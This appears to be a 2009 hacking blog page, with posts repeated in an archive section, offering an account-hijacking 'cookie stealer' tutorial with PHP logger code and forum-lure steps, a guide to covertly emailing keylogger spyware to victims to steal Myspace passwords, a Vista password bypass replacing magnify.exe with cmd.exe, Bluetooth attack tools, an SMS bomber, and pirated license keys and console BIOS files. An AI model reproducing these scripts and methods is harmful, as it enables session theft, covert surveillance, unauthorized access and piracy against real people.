يتم التشغيل بواسطة Blogger.

آخر الحلقات عن الفيسبوك

آخر حلقات الويندوز

الاقسام

آخر الحلقات الحصرية

صوت وصورة

أخبار المشاهير

توقيت المغرب

رياضة عالمية

Main Post

آخر الحلقات عن الانترنت

آخر حلقات الحماية من الهاكرز

أقسام

Send Quick Massage

الاسم

بريد إلكتروني *

رسالة *

إشترك بالمدونة

الكتاب الرسميون

الدولي

آخر الحلقات عن منتجات جوجل

المشاركات الشائعة

عن الموقع

my

Visitors

الثلاثاء، 8 سبتمبر 2009

الاثنين، 7 سبتمبر 2009

Yahoo Invisible Checker V3




Tool to see if the buddy's are hidden and some more options




__-Rapidshare download-__

__-4shared download-__

__2shared download-__

by Mr electroman

doos0.Com

yahoo



by doos0.Com

ID Maker V1.0 By~~MR electroman~~









__-download here-__

by doos0.Com

cookies stealer





Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.


What is a CookieLogger?


A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.


Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …


Step 1: Save the notepad file from the link below and Rename it as Fun.gif:




Download it.



Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:




$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


Step 3: Create a new Notepad File and Save it as logfile.txt


Step 4: Upload this file to your server



cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :




http://0fees.net



Step 5: Go to the victim forum and insert this code in the signature or a post :




Download it.



Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:




phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.


Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.


Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.


Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.






HOT APP TO SEE THE PICS OF PEOPLE WHO ARE NOT UR FRIENDS !!!

First go to :
http://apps.facebook.com/josh_owns/

Accept the app then you'll do anything you want : just copy/cut the ID, or the Name of the person and enjoy

You can even download the entire album.

If you dont want to go to click here

each time there is an addon specific :


https://addons.mozilla.org/en-US/firefox/addon/12454




الأحد، 6 سبتمبر 2009

SMS BOMBER


Image

--------------------------------------------------------------------------------------------------------------------------------------------

Complete list of carriers: (simply place over existing carrier within my program)

Alltel
AT&T/Cingular
Boost
Cellular One
Nextel
Sprint PCS
T-Mobile
Verizon
Virgin Mobile
3 River Wireless
ACSWireless
Airtouch Pagers
Aliant
Alltel
Ameritech
Arch Wireless
BeeLine GSM
Bell Atlantic
Bell Mobility
Bell Mobility Canada
BellSouth
BellSouth Blackberry
BellSouth IPS
BellSouth SMS
BellSouth Wireless
Blue Sky Frog
Bluegrass Cellular
Boost
Cellular One
Cellular One East
Cellular One PCS
Cellular One So. West
Cellular One West
Cellular South
Centennial Wireless
CenturyTel
Cincinnati Bell
Cingular
Cingular IM Plus
Claro
Clearnet
Comcast
Comviq
Corr Wireless Comm.
Dobson Cellular
Dutchtone/Orange-NL
Edge Wireless
EinsteinPCS/Airadigm
EPlus
Fido Canada
Golden Telecom
GTE
Houston Cellular
Idea Cellular
Inland Cellular
Island Tel
Kyivstar
LMT
Manitoba Telecom
MCI
MCI Phone
Meteor
Metro PCS
Metrocall Pager
Microcell
Midwest Wireless
Mobilecomm
MobileOne
Mobilfone
Mobility Bermuda
Motient
MTT
NBTel
Netcom
Nextel
NewTel
NPI Wireless
Ntelos
Optus
Orange
Oskar
Pacific Bell Cingular
PageNet Canada
Pioneer/Enid Cellular
Plus GSM Poland
Powertel
Primco
Primtel
Public Service Cell.
Qualcomm
Qwest
RAM Page
Rogers Canada
Safaricom
Satelindo GSM
SCS-900
Simple Freedom
Skytel Pagers
Smart Telecom
Southern LINC
Southwestern Bell
Sprint Pagers
Sprint PCS
SunCom
SunCom (TMS)
SureWest Comm.
SwissCom Mobile
T-Mobile
T-Mobile Sidekick
T-Mobile Germany
T-Mobile UK
T-Mobile/VoiceStream
Tele2 Latvia
Telefonica Movistar
Telenor
Telia Denmark
Telus Mobility
The Phone House
TIM
UMC
Unicel
US Cellular (email)
US Cellular (txt)
Verizon
Verizon Pagers
Vessotel
Virgin Mobile
Virgin Mobile Canada
Vodafone Italy
Vodafone Japan (Chuugoku/Western)
Vodafone Japan (Hokkaido)
Vodafone Japan (Hokuriko/Central North)
Vodafone Japan (Kansai/West - Osaka)
Vodafone Japan (Kanto/Koushin/East - Tokyo)
Vodafone Japan (Kyuushu/Okinawa)
Vodafone Japan (Shikoku)
Vodafone Japan (Touhoku/Niigata/North)
Vodafone Japan (Toukai/Central)
Vodafone South Africa
Vodafone Spain
Vodafone UK
Weblink Wireless
WellCom
West Central Wireless
Western Wireless
WyndTell


DOWNLOAD


doos0.com

الخميس، 3 سبتمبر 2009

Sony Playstation 2 Emulator (PCSX2) v0.9.6 with EU,US BIOS

Sony Playstation 2 Emulator (PCSX2) v0.9.6 with EU,US BIOS



Sony Playstation 2 Emulator v0.9.6+EU,US BIOS | Emulators | 21 MB

After nearly 16 months, here comes a new Pcsx2 version. PCSX2 v0.9.6

These months were somewhat problematic for pcsx2, due to an initial slowdown of the development process. Then, last fall, the Playground branch was created, and development picked up again. Finally, with the merge of Pcsx2 and Pcsx2 playground, the emulator’s development returned once again as it was before, and now we can give you a release which should (we hope!) leave you happy.


We would like to thank everyone that was still waiting for a release, and coming to our forums. We would also like to thank everyone to encouraged and otherwise supported us. This release is especially for you.


Important note: you NEED to update DirectX or you won’t be able to use the emulator!


What’s new in 0.9.6?



- Huge rewrite, mainly from the new members of the Playground branch! Too many speedups, optimizations and other fixes to write here! Many famous games will now work.
- Dropped VM build replaced by the all new Vtlb, meaning no more ‘Cannot allocate memory’ errors at start up, more accurate emulation, slightly lower speeds but with many optimizations to come
- Full memcard support, working in all games
- Improved Frameskip/VU-skip
- Special Game Fixes Section
- Advanced Options Section for custom tweaking VU/FPU behavior.
- Rewritten Multithreaded GS (MTGS) mode, with as much as 15% speedup for HT machines (only 3-5% for Dual Core), and fixes many instabilities.
- Improved VU/FPU Flags and Clamping support (helps fix odd behaviors and SPS in some games)
- Improved EE/IOP synchronization (fixes many freeze-ups and vmhacks).
- Improved CDVD support.




http://rapidshare.com/files/271762253/PCSX2_v0.9.6_with_BIOS.rar


http://hotfile.com/dl/10901816/d7f1991/PCSX2_v0.9.6_with_BIOS.rar.html


http://doos0.Com

gsM hack




Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).


If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.


This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.


Discovering Bluetooth Devices


BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.


BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.


BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification.


BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks.


Hacking Bluetooth Devices


BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.


CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack.


Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.


Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.


Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.


BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges.


Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.


BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.


UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them.


For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours.


What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.

DOWNLOAD 1


DOWNLOAD 2

my space



MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post you’ll fine the real and working ways to hack a Myspace.


THINGS YOU SHOULD KNOW BEFORE PROCEEDING


With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.


1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.


2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams.


The following are the only 2 foolproof methods to hack Myspace.




1. How to Hack Myspace – The Easiest Way


The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation. This can also be used on local computer.

SniperSpy

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer. Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What is the best way to deploy the keylogger onto remote PC?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

n my experience of more than 6 years I have tested almost 50 spy softwares. Out of these one of my favorite Spy software is SniperSpy. The following are some of the reasons for which I recommend SniperSpy for you.1. SniperSpy can be used to Spy on your local PC as well as a remote PC since it supports remote installation feature.

2. On the whole Internet there exists only a few spy softwares that support remote installation and SniperSpy is the best among them.

3. You can view the LIVE screenshot of the remote computer. Not only screenshots, but also you can see every activity on the remote comuter LIVE.

4. With SniperSpy you can take a complete control of the remote PC. You can logoff, restart or shutdown the remote PC right from your PC.

5. SniperSpy records every activity of the remote computer.

6. SniperSpy is completely stealth and remains undetected.

7. SniperSpy captures every keystroke that is typed. This includes email passwords, login passwords, instant messenger passwords etc.

8. SniperSpy has the ability to bypass any firewall.

How it Works?

After you purchase the SniperSpy software, you will be able to download the a program that allows you to create a remotely deployable module.



To deploy the module you can attach the exe file to any regular email and send to the remote PC. Modules can be dropped into a Word, Wordpad or Works document, or even a ZIP or RAR file. When the module is executed it will not display anything on the screen if you chose the “Do Not Alert User” option during module creation.

After you have sent the email, wait until the remote user checks their email and executes the module. After the module is executed, activity will begin recording immediately. After activity starts recording it will then be uploaded to your personal SniperSpy web space.


Wait about fifteen minutes after the module has been executed. Then login to your online account. You will be able to view any recorded activity there using a secure https connection. Logs are updated every six minutes. No matter where you are, you can log into your SniperSpy account from any Internet connection.


How effective is SniperSpy?


Once you’ve got the module executed on the target machine, it begins logging keystrokes, websites visited, internet searches, file changes, instant message chats, and taking screenshots of computer activity. I decided to install the module remotely on my friend’s laptop. A few hours after it’s successful installation, I was able to login to the control panel to see the screenshots, keystrokes (includes passwords), websites visited and many more. Whenever he used to come online I was able to monitor has activity LIVE. It was quite amazing to sit at my place and watch his activities remotely.


Improvements in the latest version of SniperSpy


In the older versions of Sniperspy the online control panel was pretty slow taking upto a minute to communicate with the remote computer. This was a bit annoying.


But this problem is fixed in the latest version. In fact it’s extremely fast now!


How is SniperSpy different from other spy softwares?


The following features makes SniperSpy stand out from the crowd


1. Sniper Spy is more reliable than other spy softwares since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.


2. SniperSpy offers excellent customer support.


3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.


Verdict: Sniperspy Internet Monitor Software



This review can only give you an idea of just how powerful SniperSpy really is and how it can help you to monitor internet activity. There is not much that can be hidden from SniperSpy and if you visit their website you will get the complete picture.
There are a few computer remote spying programs available but Sniperspy is without doubt one of the best ones you can buy. Customer support is excellent and if you want peace of mind then this will allow you to find out the truth very quickly.

Check SniperSpy out right now and discover for yourself how much is worth to you compared with the few dollars it costs.

You can get SniperSpy from the following link: SniperSpy Homepage

SniperSpy

الأربعاء، 2 سبتمبر 2009

Crack password in windows vista


http://www.gadgetell.com/images/2006/11/windows-vista-wallpaper1.jpg
Try to boot from windows vista dvd or if u have oem computer go to repair options !!

Boot to Win RE
Click Command Prompt option.
Type the following command:
C:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Restart computer
Click on Easy of Access centre left side bottom à Choose Magnify option à Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Logon on administrator account and then using User Account page, remove password for the other account
Search for Magnify.exe in start search and click on it
Command prompt opens up
Type: net user administrator /active:no
Restart the computer
This will disable the administrator account.
Boot to winRE
Type the following:
C:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
exit
Restart the computer – system logs on to the User account without asking for password provided there is only one user account.

by Mr electroman



http://doos0.com

hacking tutos

1000 Hacker Tutorials 2009 - Full Version



Download


http://rapidshare.com/files/263878352/1000_Hacker_Tutorials_2008.rar


by


Mr electroman


http://dOOS0.Com


windows hacking


Big Book of Windows Hacks
O’Reilly Media, Inc.; 1 edition | ISBN:0596528353 | 652 pages | October 23, 2007 | PDF | 72 Mb

Bigger, better, and broader in scope, the Big Book of Windows Hacks gives you everything you need to get the most out of your Windows Vista or XP system, including its related applications and the hardware it runs on or connects to. Whether you want to tweak Vista’s Aero interface, build customized sidebar gadgets and run them from a USB key, or hack the “unhackable” screensavers, you’ll find quick and ingenious ways to bend these recalcitrant operating systems to your will.

The Big Book of Windows Hacks focuses on Vista, the new bad boy on Microsoft’s block, with hacks and workarounds that also work for Windows XP. You can read each hack in just a few minutes, saving countless hours of searching for the right answer. The step-by-step instructions let you apply the solutions in no time. This book takes you beyond the operating system with hacks for applications like Internet Explorer 7 and Office 2007, and hardware such as the Zune, your wireless router, and the PC itself.



The Big Book of Windows Hacks includes:
Expanded tutorials, new background material, a series of “quick hacks”, and informative sidebars
Security hacks, including protection at wireless hotspots, hacking Vista file permissions and user account protection, and more
Efficiency hacks, such as tweaking your PC hardware, troubleshooting hardware problems, and speeding up system performance
Fun hacks, like building a custom Media Center PC or turning a PC into a digital video recorder
“Beyond Windows” hacks for running Linux inside Vista, dual-booting Linux/Windows or XP/Vista, or emulate classic video games on your PC

In all, this remarkable book contains more than 100 hacks so that the power user in you never again needs to be at the mercy of systems and hardware run by Microsoft’s omnipotent Vista and XP operating systems.


http://rapidshare.com/files/260852366/IndoGear.Com.ebook.Windows_Vista_Hacks.0596528353.zip


http://hotfile.com/dl/9282337/a932062/IndoGear.Com.ebook.Windows_Vista_Hacks.0596528353.zip.html

kaspersky ekys



KIS 2010 New Keys

Kaspersky internet security 2010 Keys
Kaspersky internet security 9 (2010) New Activation Keys

Last KIS 2010 keys update 13/8/2009

http://www.ziddu.com/download/6288601/KIS_9_Keys.rar.html

Download KIS 2010 New Keys

How to Install the Key
-Click on "License" which is down along the bottom next to "Support"
-Click on "Activate new license"
-Enter this expired Beta code: T1JVS-NNMBD-K1QTN-SUBP8 and then it'll result in an error
-When the new window pops up, you are given the option to browse to your activation key.

by Mr electroman


http://doos0.Com







التصنيفات


Yahoo Invisible Checker V3




Tool to see if the buddy's are hidden and some more options




__-Rapidshare download-__

__-4shared download-__

__2shared download-__

by Mr electroman

doos0.Com

yahoo



by doos0.Com

ID Maker V1.0 By~~MR electroman~~









__-download here-__

by doos0.Com

cookies stealer





Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.


What is a CookieLogger?


A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.


Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …


Step 1: Save the notepad file from the link below and Rename it as Fun.gif:




Download it.



Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:




$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


Step 3: Create a new Notepad File and Save it as logfile.txt


Step 4: Upload this file to your server



cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :




http://0fees.net



Step 5: Go to the victim forum and insert this code in the signature or a post :




Download it.



Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:




phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.


Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.


Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.


Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.






HOT APP TO SEE THE PICS OF PEOPLE WHO ARE NOT UR FRIENDS !!!

First go to :
http://apps.facebook.com/josh_owns/

Accept the app then you'll do anything you want : just copy/cut the ID, or the Name of the person and enjoy

You can even download the entire album.

If you dont want to go to click here

each time there is an addon specific :


https://addons.mozilla.org/en-US/firefox/addon/12454




SMS BOMBER


Image

--------------------------------------------------------------------------------------------------------------------------------------------

Complete list of carriers: (simply place over existing carrier within my program)

Alltel
AT&T/Cingular
Boost
Cellular One
Nextel
Sprint PCS
T-Mobile
Verizon
Virgin Mobile
3 River Wireless
ACSWireless
Airtouch Pagers
Aliant
Alltel
Ameritech
Arch Wireless
BeeLine GSM
Bell Atlantic
Bell Mobility
Bell Mobility Canada
BellSouth
BellSouth Blackberry
BellSouth IPS
BellSouth SMS
BellSouth Wireless
Blue Sky Frog
Bluegrass Cellular
Boost
Cellular One
Cellular One East
Cellular One PCS
Cellular One So. West
Cellular One West
Cellular South
Centennial Wireless
CenturyTel
Cincinnati Bell
Cingular
Cingular IM Plus
Claro
Clearnet
Comcast
Comviq
Corr Wireless Comm.
Dobson Cellular
Dutchtone/Orange-NL
Edge Wireless
EinsteinPCS/Airadigm
EPlus
Fido Canada
Golden Telecom
GTE
Houston Cellular
Idea Cellular
Inland Cellular
Island Tel
Kyivstar
LMT
Manitoba Telecom
MCI
MCI Phone
Meteor
Metro PCS
Metrocall Pager
Microcell
Midwest Wireless
Mobilecomm
MobileOne
Mobilfone
Mobility Bermuda
Motient
MTT
NBTel
Netcom
Nextel
NewTel
NPI Wireless
Ntelos
Optus
Orange
Oskar
Pacific Bell Cingular
PageNet Canada
Pioneer/Enid Cellular
Plus GSM Poland
Powertel
Primco
Primtel
Public Service Cell.
Qualcomm
Qwest
RAM Page
Rogers Canada
Safaricom
Satelindo GSM
SCS-900
Simple Freedom
Skytel Pagers
Smart Telecom
Southern LINC
Southwestern Bell
Sprint Pagers
Sprint PCS
SunCom
SunCom (TMS)
SureWest Comm.
SwissCom Mobile
T-Mobile
T-Mobile Sidekick
T-Mobile Germany
T-Mobile UK
T-Mobile/VoiceStream
Tele2 Latvia
Telefonica Movistar
Telenor
Telia Denmark
Telus Mobility
The Phone House
TIM
UMC
Unicel
US Cellular (email)
US Cellular (txt)
Verizon
Verizon Pagers
Vessotel
Virgin Mobile
Virgin Mobile Canada
Vodafone Italy
Vodafone Japan (Chuugoku/Western)
Vodafone Japan (Hokkaido)
Vodafone Japan (Hokuriko/Central North)
Vodafone Japan (Kansai/West - Osaka)
Vodafone Japan (Kanto/Koushin/East - Tokyo)
Vodafone Japan (Kyuushu/Okinawa)
Vodafone Japan (Shikoku)
Vodafone Japan (Touhoku/Niigata/North)
Vodafone Japan (Toukai/Central)
Vodafone South Africa
Vodafone Spain
Vodafone UK
Weblink Wireless
WellCom
West Central Wireless
Western Wireless
WyndTell


DOWNLOAD


doos0.com

Sony Playstation 2 Emulator (PCSX2) v0.9.6 with EU,US BIOS

Sony Playstation 2 Emulator (PCSX2) v0.9.6 with EU,US BIOS



Sony Playstation 2 Emulator v0.9.6+EU,US BIOS | Emulators | 21 MB

After nearly 16 months, here comes a new Pcsx2 version. PCSX2 v0.9.6

These months were somewhat problematic for pcsx2, due to an initial slowdown of the development process. Then, last fall, the Playground branch was created, and development picked up again. Finally, with the merge of Pcsx2 and Pcsx2 playground, the emulator’s development returned once again as it was before, and now we can give you a release which should (we hope!) leave you happy.


We would like to thank everyone that was still waiting for a release, and coming to our forums. We would also like to thank everyone to encouraged and otherwise supported us. This release is especially for you.


Important note: you NEED to update DirectX or you won’t be able to use the emulator!


What’s new in 0.9.6?



- Huge rewrite, mainly from the new members of the Playground branch! Too many speedups, optimizations and other fixes to write here! Many famous games will now work.
- Dropped VM build replaced by the all new Vtlb, meaning no more ‘Cannot allocate memory’ errors at start up, more accurate emulation, slightly lower speeds but with many optimizations to come
- Full memcard support, working in all games
- Improved Frameskip/VU-skip
- Special Game Fixes Section
- Advanced Options Section for custom tweaking VU/FPU behavior.
- Rewritten Multithreaded GS (MTGS) mode, with as much as 15% speedup for HT machines (only 3-5% for Dual Core), and fixes many instabilities.
- Improved VU/FPU Flags and Clamping support (helps fix odd behaviors and SPS in some games)
- Improved EE/IOP synchronization (fixes many freeze-ups and vmhacks).
- Improved CDVD support.




http://rapidshare.com/files/271762253/PCSX2_v0.9.6_with_BIOS.rar


http://hotfile.com/dl/10901816/d7f1991/PCSX2_v0.9.6_with_BIOS.rar.html


http://doos0.Com

gsM hack




Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).


If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.


This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.


Discovering Bluetooth Devices


BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.


BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.


BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification.


BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks.


Hacking Bluetooth Devices


BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.


CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack.


Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.


Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.


Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.


BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges.


Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.


BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.


UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them.


